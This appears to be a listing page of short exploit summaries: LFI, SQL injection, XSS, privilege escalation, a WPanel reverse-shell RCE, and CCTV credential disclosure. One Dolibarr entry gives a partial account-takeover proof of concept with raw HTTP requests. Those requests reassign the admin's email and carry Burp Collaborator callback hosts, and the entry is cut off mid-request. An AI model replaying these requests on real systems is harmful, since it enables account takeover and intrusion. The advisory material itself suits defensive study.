The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system.
The Remote Mouse service in version 4.002 of the Remote Mouse software for Windows has an unquoted service path vulnerability. This vulnerability could allow an attacker to escalate privileges by placing a malicious executable in a higher directory in the system's PATH environment variable.
This exploit allows an authenticated user to execute remote code on the WPanel 4.3.1 CMS. It works on Linux, Windows, and Mac platforms. The exploit uses a PHP reverse shell script to gain remote access to the target system. The exploit requires the user to provide the target URL, email, and password.
Using the below chain of issues attacker can compromise any dolibarr user account including the admin. Poc: 1. Visit https://example.com/api/index.php/login?login=demo&password=demo try to login with a test user with 0 permissons or less permissions. 2. We will receive an api token in return. 3. Next we need to fetch the user id of the user whose account we want to own. First we need to fetch the user id of the admin user using the below api. Request1: GET /api/index.php/users/login/admin HTTP/1.1Host: preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflateDOLAPIKEY: test1337 Connection: close This will return the user details using the username. Now update the victim user account via below api (include the json body received from the previous request1 and replace the email id from below json to the attacker controlled email) Request2: PUT /api/index.php/users/*12* HTTP/1.1 Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept: application/jsonAccept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflateDOLAPIKEY: test1337 Origin: https://preview2.dolibarr.orgConnection: closeReferer: http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length: 3221 {"id": "12","sta
Firstly add client group. After uploading the file from the user with any role, payload is written in the 'title' part of the redirected page, add group your created and save. For users with the 'System Administrator' role, XSS is triggered on the 'Dashboard' page.
This exploit targets a vulnerability in MySQL User-Defined (Linux) x32 / x86_64. It allows an attacker to escalate their privileges locally by executing malicious code through the 'sys_exec' function.
The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text.
The Police Crime Record Management System 1.0 is vulnerable to SQL injection in the 'casedetails' parameter. An attacker can exploit this vulnerability to manipulate the SQL query and potentially extract sensitive information from the database.
The Police Crime Record Management System 1.0 is vulnerable to 'Multiple' Stored Cross-Site Scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious code in the 'Firstname' or 'Othernames' field when adding staff. This allows the attacker to execute arbitrary JavaScript code in the context of the admin user's browser.
The WordPress Plugin Picture Gallery 1.4.2 is vulnerable to stored cross-site scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious JavaScript code into the 'Edit Content URL' input field in the admin panel. When the code is triggered, it executes in the context of the affected website, allowing the attacker to steal sensitive information or perform unauthorized actions on behalf of the user.
Services By CQR